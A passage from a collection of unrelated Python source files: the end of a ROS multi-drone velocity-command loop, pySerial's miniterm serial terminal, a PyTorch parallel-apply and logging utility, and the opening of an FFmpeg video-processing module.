self.twist[j].angular.y = 0.0
last_forward = [0.0 for i in range(self.multi_num)]
last_upward = [0.0 for i in range(self.multi_num)]
last_leftward = [0.0 for i in range(self.multi_num)]
last_orientation = [0.0 for i in range(self.multi_num)]
last_ctrl_leader = False
last_cmd_vel_mask = False
last_multirotor_get_control = [0 for i in range(self.multi_num)]
last_forward_all = 0.0
last_upward_all = 0.0
last_leftward_all = 0.0
last_orientation_all = 0.0
num = 0
rate = rospy.Rate(30)
check_stop_flag = False
print('StartRun!')
start_flag = False
flag = False
time = 0
while True:
if not start_flag:
flag = self.q_start_control_flag.get()
if flag:
time += 1
start_flag = True
num += 1
if self.q_multirotor_get_control.empty():
multirotor_get_control = last_multirotor_get_control
else:
multirotor_get_control = self.q_multirotor_get_control.get()
last_multirotor_get_control = multirotor_get_control
if self.q_forward.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.x = last_forward[i]
else:
forward = self.q_forward.get()
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.x = forward
last_forward[i] = self.twist[i].linear.x
if self.q_upward.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.z = last_upward[i]
else:
upward = self.q_upward.get()
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.z = upward
last_upward[i] = self.twist[i].linear.z
if self.q_leftward.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.y = last_leftward[i]
else:
leftward = self.q_leftward.get()
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].linear.y = leftward
last_leftward[i] = self.twist[i].linear.y
if self.q_orientation.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].angular.z = last_orientation[i]
else:
orientation = self.q_orientation.get()
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.twist[i].angular.z = orientation
last_orientation[i] = self.twist[i].angular.z
if self.q_ctrl_leader.empty():
self.ctrl_leader = last_ctrl_leader
else:
self.ctrl_leader = self.q_ctrl_leader.get()
last_ctrl_leader = self.ctrl_leader
if self.q_cmd.empty():
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.cmd[i] = ''
else:
cmd = self.q_cmd.get()
if self.ctrl_leader:
for i in range(self.multi_num):
if i == 1:
self.cmd[i] = cmd
else:
self.cmd[i] = ''
else:
for i in range(self.multi_num):
if multirotor_get_control[i]:
self.cmd[i] = cmd
print(self.cmd[i])
if self.q_cmd_vel_mask.empty():
self.cmd_vel_mask = last_cmd_vel_mask
else:
self.cmd_vel_mask = self.q_cmd_vel_mask.get()
last_cmd_vel_mask = self.cmd_vel_mask
if self.q_stop_flag.empty():
pass
else:
check_stop_flag = self.q_stop_flag.get()
if check_stop_flag:
for i in range(self.multi_num):
self.cmd[i] = 'AUTO.RTL'
if self.ctrl_leader:
if self.control_type == 'vel':
self.leader_cmd_vel_flu_pub.publish(self.twist[1])
else:
self.leader_cmd_accel_flu_pub.publish(self.twist[1])
self.leader_cmd_pub.publish(self.cmd[1])
print self.cmd[1]
else:
for i in range(self.multi_num):
if not self.cmd_vel_mask:
if self.control_type == 'vel':
self.multi_cmd_vel_flu_pub[i].publish(self.twist[i])
else:
self.multi_cmd_accel_flu_pub[i].publish(self.twist[i])
self.multi_cmd_pub[i].publish(self.cmd[i])
# print self.cmd[0]
else:
print 'shut down!'
rate.sleep()
if check_stop_flag:
self.q_stop_flag.put(True)
rospy.signal_shutdown('STOP!')
break
def display(self, data):
self.text_show_info.setPlainText(data)
def plot(self, data):
for i in range(self.multi_num):
self.m.ax.plot(data[i][0], data[i][1], color = self.color_plot[i])
# self.m.canvas_update(self.map)
self.m.draw()
|
miniterm.py
|
#!/Users/tomasero/Library/Mobile Documents/com~apple~CloudDocs/Documents/MIT/Spring19/byte.it/Adafruit_Python_BluefruitLE/examples/env/bin/python3
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
open port temporarily, allow reconnect, exit and port change to get
out of the loop
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from an other script
# e.g to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
|
utils.py
|
# Adapted from: https://github.com/ArrowLuo/CLIP4Clip/blob/master/util.py
import torch
import torch.nn as nn
import threading
from torch._utils import ExceptionWrapper
import logging
def get_a_var(obj):
if isinstance(obj, torch.Tensor):
return obj
if isinstance(obj, list) or isinstance(obj, tuple):
for result in map(get_a_var, obj):
if isinstance(result, torch.Tensor):
return result
if isinstance(obj, dict):
for result in map(get_a_var, obj.items()):
if isinstance(result, torch.Tensor):
return result
return None
def parallel_apply(fct, model, inputs, device_ids):
modules = nn.parallel.replicate(model, device_ids)
assert len(modules) == len(inputs)
lock = threading.Lock()
results = {}
grad_enabled = torch.is_grad_enabled()
def _worker(i, module, input):
torch.set_grad_enabled(grad_enabled)
device = get_a_var(input).get_device()
try:
with torch.cuda.device(device):
# this also avoids accidental slicing of `input` if it is a Tensor
if not isinstance(input, (list, tuple)):
input = (input,)
output = fct(module, *input)
with lock:
results[i] = output
except Exception:
with lock:
results[i] = ExceptionWrapper(where="in replica {} on device {}".format(i, device))
if len(modules) > 1:
threads = [threading.Thread(target=_worker, args=(i, module, input))
for i, (module, input) in enumerate(zip(modules, inputs))]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
else:
_worker(0, modules[0], inputs[0])
outputs = []
for i in range(len(inputs)):
output = results[i]
if isinstance(output, ExceptionWrapper):
output.reraise()
outputs.append(output)
return outputs
def get_logger(filename=None):
logger = logging.getLogger('logger')
logger.setLevel(logging.DEBUG)
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
if filename is not None:
handler = logging.FileHandler(filename)
handler.setLevel(logging.DEBUG)
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))
logging.getLogger().addHandler(handler)
return logger
|
process.py
|
'''Video Processing
=====================
Provides a class that manipulates files en-masse using FFmpeg. It can
compress/uncompress/merge/concatenate or perform other tasks on video files.
In order to use this module, the ffmpeg binaries need to be installed in the
parent directory of this module, or in $(FFMPEG_ROOT)/bin.
Keyboard Keys
-------------
`space`:
Toggles the current pause state.
`enter`:
Starts processing.
`escape`:
Stop the processing.
'''
import sys
import json
from os import makedirs
from os.path import join, exists, expanduser, abspath, isdir, isfile, dirname,\
split, splitext, getsize, sep
import logging
from threading import Thread
